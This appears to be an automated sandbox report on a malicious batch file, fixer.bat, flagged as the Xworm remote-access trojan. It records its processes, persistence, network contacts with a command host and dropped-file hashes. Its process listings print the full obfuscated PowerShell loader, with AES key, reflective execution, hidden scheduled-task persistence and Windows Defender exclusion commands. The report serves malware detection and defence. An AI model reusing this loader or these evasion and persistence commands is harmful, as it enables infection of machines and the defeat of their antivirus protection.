Analysis Overview
SHA256
2b7272581314f0f4b3cd41c32cc9ebd5950eb1acf67601bd6bdf1365aacc8eab
Threat Level: Known bad
The file fixer.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Checks computer location settings
Adds Run key to start application
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 08:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 08:07
Reported
2024-06-01 08:20
Platform
win10v2004-20240226-en
Max time kernel
372s
Max time network
381s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTcjO=New-Object System.IO.MemoryStream(,$param_var); $KQKvZ=New-Object System.IO.MemoryStream; $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress); $cfjXo.CopyTo($KQKvZ); $cfjXo.Dispose(); $mTcjO.Dispose(); $KQKvZ.Dispose(); $KQKvZ.ToArray();}function execute_function($param_var,$param2_var){ $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WtyUv=$qAquB.EntryPoint; $WtyUv.Invoke($null, $param2_var);}$rJKpb = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $rJKpb;$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}$payloads_var=[string[]]$gPHGC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_297_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_297.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_297.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_297.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTcjO=New-Object System.IO.MemoryStream(,$param_var); $KQKvZ=New-Object System.IO.MemoryStream; $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress); $cfjXo.CopyTo($KQKvZ); $cfjXo.Dispose(); $mTcjO.Dispose(); $KQKvZ.Dispose(); $KQKvZ.ToArray();}function execute_function($param_var,$param2_var){ $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WtyUv=$qAquB.EntryPoint; $WtyUv.Invoke($null, $param2_var);}$rJKpb = 'C:\Users\Admin\AppData\Roaming\Windows_Log_297.bat';$host.UI.RawUI.WindowTitle = $rJKpb;$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}$payloads_var=[string[]]$gPHGC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | movie-buddy.gl.at.ply.gg | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
Files
memory/1640-0-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
memory/1640-1-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3vm3ul3q.rji.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1640-7-0x000001D5F6B00000-0x000001D5F6B22000-memory.dmp
memory/1640-12-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
memory/1640-13-0x000001D5F6CC0000-0x000001D5F6D04000-memory.dmp
memory/1640-14-0x000001D5F6FB0000-0x000001D5F7026000-memory.dmp
memory/1640-15-0x000001D5F49B0000-0x000001D5F49B8000-memory.dmp
memory/1640-16-0x000001D5F4A70000-0x000001D5F4A82000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Roaming\Windows_Log_297.vbs
| MD5 | b8972a3e702cabd5cc34d1d7e2fd2287 |
| SHA1 | 45f85cb9bf26391187bffe385601d390fac49ed3 |
| SHA256 | baa37271dc1a02815295a20f341bce5fdd75ea50d40629b7687f145cdac9602a |
| SHA512 | 6e30718434cc370d2fa0e74f15e448b61efc17eef1bc5ed3402b3ad3bcae5e58de4d4a1b4ec8c64d828f5adb19c02f93fb432cf6082c5fe201915a5998fa9da8 |
C:\Users\Admin\AppData\Roaming\Windows_Log_297.bat
| MD5 | 561c4ecf6ab3848d4d45ee983b5e6bd3 |
| SHA1 | 11e581a4bd84cad824f1dfce89962ab593b4193a |
| SHA256 | 2b7272581314f0f4b3cd41c32cc9ebd5950eb1acf67601bd6bdf1365aacc8eab |
| SHA512 | 1f6f460a4df29eb2a2b1f8bb932e549e51c4b257c3ce6808038d877a50fa3b8bccaea38aa900d00e9207a764f7aebfc0f9a7b5a07bc53a9902544e0d280ad716 |
memory/1640-36-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |
memory/3120-47-0x0000016C02690000-0x0000016C026A2000-memory.dmp
memory/3120-48-0x0000016C026C0000-0x0000016C026D6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a37d50419f9463557ba395bd8249f5b6 |
| SHA1 | 1e94df7e8e5250fe70562bf4d5538c63b3171851 |
| SHA256 | 7e12a5fac8da60dc67fd5d691fe4ee244d974c07d579488863558c9ebe14c1fa |
| SHA512 | cdd4fa55ab83ed2c68d8df444755a374899bb6b6f8fd829a014b3fc2f4e17536e357a288bc8209432aa2992a35f7d1df0e04c9bc82af46e04c89b69302f1a238 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 62623d22bd9e037191765d5083ce16a3 |
| SHA1 | 4a07da6872672f715a4780513d95ed8ddeefd259 |
| SHA256 | 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010 |
| SHA512 | 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ef72c47dbfaae0b9b0d09f22ad4afe20 |
| SHA1 | 5357f66ba69b89440b99d4273b74221670129338 |
| SHA256 | 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f |
| SHA512 | 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10890cda4b6eab618e926c4118ab0647 |
| SHA1 | 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d |
| SHA256 | 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14 |
| SHA512 | a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221 |
memory/3120-99-0x0000016C026B0000-0x0000016C026BC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 08:07
Reported
2024-06-01 08:20
Platform
win11-20240508-en
Max time kernel
280s
Max time network
283s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTcjO=New-Object System.IO.MemoryStream(,$param_var); $KQKvZ=New-Object System.IO.MemoryStream; $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress); $cfjXo.CopyTo($KQKvZ); $cfjXo.Dispose(); $mTcjO.Dispose(); $KQKvZ.Dispose(); $KQKvZ.ToArray();}function execute_function($param_var,$param2_var){ $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WtyUv=$qAquB.EntryPoint; $WtyUv.Invoke($null, $param2_var);}$rJKpb = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $rJKpb;$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}$payloads_var=[string[]]$gPHGC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_446_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_446.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_446.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_446.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTcjO=New-Object System.IO.MemoryStream(,$param_var); $KQKvZ=New-Object System.IO.MemoryStream; $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress); $cfjXo.CopyTo($KQKvZ); $cfjXo.Dispose(); $mTcjO.Dispose(); $KQKvZ.Dispose(); $KQKvZ.ToArray();}function execute_function($param_var,$param2_var){ $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WtyUv=$qAquB.EntryPoint; $WtyUv.Invoke($null, $param2_var);}$rJKpb = 'C:\Users\Admin\AppData\Roaming\Windows_Log_446.bat';$host.UI.RawUI.WindowTitle = $rJKpb;$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}$payloads_var=[string[]]$gPHGC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB10D.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
Files
memory/3644-0-0x00007FFF96E03000-0x00007FFF96E05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixb342mi.dah.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3644-9-0x000002279E690000-0x000002279E6B2000-memory.dmp
memory/3644-10-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
memory/3644-12-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
memory/3644-11-0x000002279EAB0000-0x000002279EAF6000-memory.dmp
memory/3644-13-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp
memory/3644-14-0x000002279E870000-0x000002279E878000-memory.dmp
memory/3644-15-0x000002279E880000-0x000002279E892000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\Windows_Log_446.vbs
| MD5 | f1d53f9e9215d8994929dd1e08edaa2a |
| SHA1 | 3feb3e809b0ed0edd2d02a040c245b3a7ef78a35 |
| SHA256 | c2d80c5301739f899742758c62816f8e1015ce96bad9a22b7ff39f2ca3593948 |
